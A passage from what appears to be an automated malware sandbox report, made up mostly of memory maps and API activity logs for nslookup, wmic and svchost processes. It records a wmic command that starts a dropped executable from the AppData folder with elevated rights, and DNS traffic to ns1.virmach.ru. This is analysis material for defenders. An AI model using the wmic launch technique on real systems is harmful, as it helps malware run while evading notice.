| fwpuclnt.dll | 0x71540000 | 0x71586fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x71590000 | 0x71597fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x715a0000 | 0x715cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x715d0000 | 0x71653fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x71660000 | 0x716aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x73860000 | 0x7387afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x73bb0000 | 0x73bb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x73bc0000 | 0x73bddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x73be0000 | 0x73be6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x740c0000 | 0x7411efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74120000 | 0x741fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x74300000 | 0x743bdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x74530000 | 0x7455afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74610000 | 0x746bcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x74fd0000 | 0x75027fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x75090000 | 0x750d3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x764e0000 | 0x7662efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x766c0000 | 0x7683dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76840000 | 0x76986fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76e90000 | 0x7700afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007e480000 | 0x7e480000 | 0x7e57ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007e580000 | 0x7e580000 | 0x7e5a2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df9abbfffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x00007df9abc00000 | 0x7df9abc00000 | 0x7ff9abbfffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff9abc00000 | 0x7ff9abdc0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ff9abdc1000 | 0x7ff9abdc1000 | 0x7ffffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0xee8
8
19
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x70000 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList |
|
1 | |
| DNS | Get Hostname | name_out = x2vS1cum |
|
1 | |
| DNS | Resolve Name | host = ns1.virmach.ru, address_out = 109.234.35.56 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 109.234.35.56, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 44, size_out = 44 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 44 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 109.234.35.56, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 51 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 109.234.35.56, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 107 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 |
Process #15: wmic.exe
15
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\windows\syswow64\wbem\wmic.exe |
| Command Line | "C:\Windows\SysWOW64\wbem\wmic.exe" process call create "cmd /c start C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:53, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:30 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x588 |
| Parent PID | 0xd40 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
580
0x
C08
0x
6A4
0x
C40
0x
C0C
0x
C10
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00044fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d3fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f1fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00100000 | 0x001bdfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x00401fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x00443fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00450fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00460fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x00473fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0048ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00490fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x0059ffff | Private Memory | Readable, Writable |
|
|
|
- |
| msxml3r.dll | 0x005a0000 | 0x005a0fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x0062ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005dffff | Private Memory | - |
|
|
|
- |
| imm32.dll | 0x005e0000 | 0x00609fff | Memory Mapped File | Readable |
|
|
|
- |
| wmic.exe.mui | 0x005e0000 | 0x005effff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x00600fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00610fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00613fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0062ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0066ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x00670fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x00680fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x0069ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x006a0000 | 0x009d6fff | Memory Mapped File | Readable |
|
|
|
- |
| ole32.dll | 0x009e0000 | 0x00ac9fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x00b8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x00afffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x00a6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x00a4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x00a1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000a40000 | 0x00a40000 | 0x00a4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000a60000 | 0x00a60000 | 0x00a6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000a70000 | 0x00a70000 | 0x00aaffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00aeffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00afffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000b00000 | 0x00b00000 | 0x00b3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000b40000 | 0x00b40000 | 0x00b7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000b80000 | 0x00b80000 | 0x00b8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| kernelbase.dll.mui | 0x00b90000 | 0x00c6ffff | Memory Mapped File | Readable |
|
|
|
- |
| wmic.exe | 0x00c70000 | 0x00cd3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x04cdffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ce0000 | 0x04ce0000 | 0x050dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000050e0000 | 0x050e0000 | 0x05267fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000005270000 | 0x05270000 | 0x053f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000005400000 | 0x05400000 | 0x067fffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000006800000 | 0x06800000 | 0x068bbfff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000068c0000 | 0x068c0000 | 0x068fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006900000 | 0x06900000 | 0x0693ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006940000 | 0x06940000 | 0x06a3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000006a40000 | 0x06a40000 | 0x06a63fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| wow64win.dll | 0x542b0000 | 0x54329fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x54330000 | 0x5437ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x54380000 | 0x54387fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fastprox.dll | 0x6f010000 | 0x6f0cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemsvc.dll | 0x6f0d0000 | 0x6f0e0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ucrtbase.dll | 0x6f0f0000 | 0x6f1d0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| vcruntime140.dll | 0x6f1e0000 | 0x6f1f3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msoxmlmf.dll | 0x6f200000 | 0x6f20ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwmapi.dll | 0x6f210000 | 0x6f22cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msxml3.dll | 0x6f230000 | 0x6f3bdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemcomn.dll | 0x6f3c0000 | 0x6f426fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemprox.dll | 0x6f430000 | 0x6f43cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| framedynos.dll | 0x6f440000 | 0x6f47efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x6fbf0000 | 0x6fc64fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x6fdc0000 | 0x6ffccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x6ffd0000 | 0x7014dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x715a0000 | 0x715cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x71720000 | 0x719eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x73860000 | 0x7387afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x73bb0000 | 0x73bb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x73bc0000 | 0x73bddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| combase.dll | 0x73bf0000 | 0x73dacfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel.appcore.dll | 0x73db0000 | 0x73dbbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x73dc0000 | 0x73edefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x73ee0000 | 0x73f71fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| powrprof.dll | 0x73f80000 | 0x73fc3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x73fd0000 | 0x740bafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x740c0000 | 0x7411efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74120000 | 0x741fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x74300000 | 0x743bdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x74530000 | 0x7455afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74610000 | 0x746bcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| windows.storage.dll | 0x746c0000 | 0x74bb8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shcore.dll | 0x74bc0000 | 0x74c4cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x74f10000 | 0x74f54fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x74f60000 | 0x74f6efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x74fd0000 | 0x75027fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x75090000 | 0x750d3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x764e0000 | 0x7662efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x76630000 | 0x766b3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x766c0000 | 0x7683dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76840000 | 0x76986fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76dc0000 | 0x76e3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x76e40000 | 0x76e76fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76e90000 | 0x7700afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f590000 | 0x7f590000 | 0x7f68ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007f690000 | 0x7f690000 | 0x7f6b2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df9abbfffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x00007df9abc00000 | 0x7df9abc00000 | 0x7ff9abbfffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff9abc00000 | 0x7ff9abdc0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ff9abdc1000 | 0x7ff9abdc1000 | 0x7ffffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0x580
15
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\wbem\wmic.exe, base_address = 0xc70000 |
|
1 | |
| COM | Create | interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54 |
|
1 | |
| COM | Create | interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-03-14 02:01:08 (Local Time) |
|
1 |
Process #17: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:55, Reason: RPC Server |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:28 |
| Remarks | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x330 |
| Parent PID | 0x1f4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
F28
0x
C60
0x
AD4
0x
9C4
0x
9B0
0x
954
0x
940
0x
4EC
0x
8E4
0x
8CC
0x
8C8
0x
8C0
0x
8A4
0x
8B0
0x
8AC
0x
89C
0x
894
0x
888
0x
884
0x
424
0x
868
0x
82C
0x
814
0x
804
0x
768
0x
754
0x
73C
0x
4C4
0x
6E0
0x
6D8
0x
6D4
0x
648
0x
550
0x
53C
0x
54C
0x
4D4
0x
8
0x
484
0x
7F4
0x
7A8
0x
760
0x
690
0x
5FC
0x
5F0
0x
5E0
0x
58C
0x
50C
0x
470
0x
448
0x
40C
0x
1F0
0x
188
0x
19C
0x
124
0x
E4
0x
3E4
0x
3E0
0x
3DC
0x
3D8
0x
3D4
0x
3D0
0x
3CC
0x
3C4
0x
3C0
0x
3BC
0x
334
0x
C4C
0x
994
0x
68C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000de99780000 | 0xde99780000 | 0xde997fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de99800000 | 0xde99800000 | 0xde999fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de99b80000 | 0xde99b80000 | 0xde99c7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de99c80000 | 0xde99c80000 | 0xde99d7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de99d80000 | 0xde99d80000 | 0xde99e7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de99f80000 | 0xde99f80000 | 0xde99ffffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9a000000 | 0xde9a000000 | 0xde9a0fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9a100000 | 0xde9a100000 | 0xde9a1fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9a200000 | 0xde9a200000 | 0xde9a27ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9a280000 | 0xde9a280000 | 0xde9a37ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9a380000 | 0xde9a380000 | 0xde9a3fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9a400000 | 0xde9a400000 | 0xde9a47ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9a480000 | 0xde9a480000 | 0xde9a57ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9a580000 | 0xde9a580000 | 0xde9a67ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9a680000 | 0xde9a680000 | 0xde9a77ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9a780000 | 0xde9a780000 | 0xde9a87ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9a880000 | 0xde9a880000 | 0xde9a97ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9ab80000 | 0xde9ab80000 | 0xde9ac7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9ac80000 | 0xde9ac80000 | 0xde9acfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9ad00000 | 0xde9ad00000 | 0xde9adfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9ae00000 | 0xde9ae00000 | 0xde9aefffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9b000000 | 0xde9b000000 | 0xde9b07ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9b080000 | 0xde9b080000 | 0xde9b17ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9b280000 | 0xde9b280000 | 0xde9b2fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9b300000 | 0xde9b300000 | 0xde9b3fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9b400000 | 0xde9b400000 | 0xde9b4fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9b500000 | 0xde9b500000 | 0xde9b5fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9b600000 | 0xde9b600000 | 0xde9b67ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9b680000 | 0xde9b680000 | 0xde9b77ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9b880000 | 0xde9b880000 | 0xde9b97ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9ba80000 | 0xde9ba80000 | 0xde9bb7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9bb80000 | 0xde9bb80000 | 0xde9bbfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9bc00000 | 0xde9bc00000 | 0xde9bc7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9bc80000 | 0xde9bc80000 | 0xde9bcfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9bd00000 | 0xde9bd00000 | 0xde9bd7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9bd80000 | 0xde9bd80000 | 0xde9bdfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9be00000 | 0xde9be00000 | 0xde9be7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9be80000 | 0xde9be80000 | 0xde9bf7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9c080000 | 0xde9c080000 | 0xde9c0fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9c100000 | 0xde9c100000 | 0xde9c17ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9c180000 | 0xde9c180000 | 0xde9c27ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9c280000 | 0xde9c280000 | 0xde9c2fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9c300000 | 0xde9c300000 | 0xde9c3fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9c400000 | 0xde9c400000 | 0xde9c47ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9c480000 | 0xde9c480000 | 0xde9c57ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9c580000 | 0xde9c580000 | 0xde9c67ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9c680000 | 0xde9c680000 | 0xde9c77ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9c780000 | 0xde9c780000 | 0xde9c87ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9c880000 | 0xde9c880000 | 0xde9c8fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9c900000 | 0xde9c900000 | 0xde9c97ffff | Private Memory | Readable, Writable |
|
|
|
- |
